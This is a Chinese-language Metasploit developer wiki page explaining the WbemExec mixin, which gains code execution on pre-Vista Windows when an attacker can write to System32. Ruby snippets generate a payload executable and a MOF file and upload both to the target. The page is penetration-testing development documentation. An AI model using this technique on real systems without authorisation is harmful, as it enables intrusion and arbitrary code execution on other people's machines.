Windows管理規范(WMI)是Microsoft實施的基于Web的企業管理(WBEM),它使用管理對象格式(MOF)來創建通用信息模型(CIM)類。在Stuxnet誕生之前,安全社區實際上并不熟悉這種技術的惡毒,Stuxnet使用MOF文件來利用漏洞,允許攻擊者通過假打印機后臺處理程序服務創建文件。這個技術后來在Metasploit的ms10_061_spoolss.rb模塊中進行了逆向和演示,這大大改變了我們處理寫入權限攻擊的方式。一般來說,如果你發現自己能夠寫入system32,你很可能會利用這種技術。
### 要求
要能夠使用`WBemExec` mixin,您必須滿足以下要求:
* `C:\Windows\System32\` 寫入權限
* `C:\Windows\System32\Wbem\` 寫入權限
* 目標不能比Windows Vista更新(所以對于XP,Win 2003或更早的版本來說,這些功能大多是好的)。這更多的是API的限制,而不是技術。較新的Windows操作系統需要首先預編譯MOF文件。
### 用法
首先,在你的`Metasploit3`類范圍內包含`WbemExec` mixin 。您還需要`EXE ` mixin生成一個可執行文件:
~~~
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
~~~
接下來,生成有效載荷名稱和可執行文件:
~~~
payload_name = "evil.exe"
exe = generate_payload_exe
~~~
然后使用該generate_mof方法生成mof文件。第一個參數應該是mof文件的名稱,第二個參數是有效負載名稱:
~~~
mof_name = "evil.mof"
mof = generate_mof(mof_name, payload_name)
~~~
現在,您已經準備好將文件寫入/上傳到目標機器。始終確保您首先上傳有效負載可執行文件到`C:\Windows\System32\`。
~~~
upload_file_to_system32(payload_name, exe) # Write your own upload method
~~~
然后現在你可以上傳`mof`文件到`C:\Windows\System32\wbem\`:
~~~
upload_mof(mof_name, mof) # Write your own upload method
~~~
一旦mof文件被上傳,Windows管理服務應該選擇并執行它,這將最終在system32中執行你的有效載荷。另外,使用后,mof文件將自動移出mof目錄。
### 參考
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/wbemexec.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms10_061_spoolss.rb
- Home
- 開始使用
- 安裝metasploit開發環境
- 使用metasploit
- 使用git
- 報告一個bug
- 貢獻代碼
- 貢獻給metasploit
- 創建一個loginscans Metasploit模塊
- 接受模塊和增強功能的指導
- 常見的Metasploit模塊代碼錯誤
- 樣式提示
- metasploit提交者
- metasploit開發
- 為什么是ruby
- 樣式提示
- 如何開始寫一個exploit
- 如何開始寫一個輔助模塊
- 如何開始寫一個post模塊
- 如何開始寫一個Meterpreter腳本
- 載入外部模塊
- exploit rank
- Metasploit模塊引用標識符
- 怎么在你的exploit中確認window補丁程序級別
- 如何使用filedropper清理文件
- 如何棄用metasploit模塊
- 如何在模塊開發中報告或儲存數據
- 在metasploit如何使用日志
- 如何在metasploit對JavaScript進行混淆
- 如何解析一個http響應
- 如何使用HTTPClient發送HTTP請求
- 如何使用命令階段
- 如何使用數據儲存選項
- 如何在window后期開發中使用railgun
- 如何在exploit中使用powershell
- 如何使用PhpEXE來利用任意文件上傳漏洞
- 如何使用FILEFORMAT mixin創建一個文件格式exploit
- 如何使用BrowserExploitServer編寫一個瀏覽器exploit
- 如何使用HttpServer編寫瀏覽器exploit
- 如何編寫一個check()方法
- 如何使用Seh mixin來利用異常處理程序
- 如何在Windows上使用WbemExec進行寫入權限攻擊
- 如何使用httpserver和httpclient編寫一個模塊
- payloads如何工作
- 如何免殺
- 如何正確使用metasploit模塊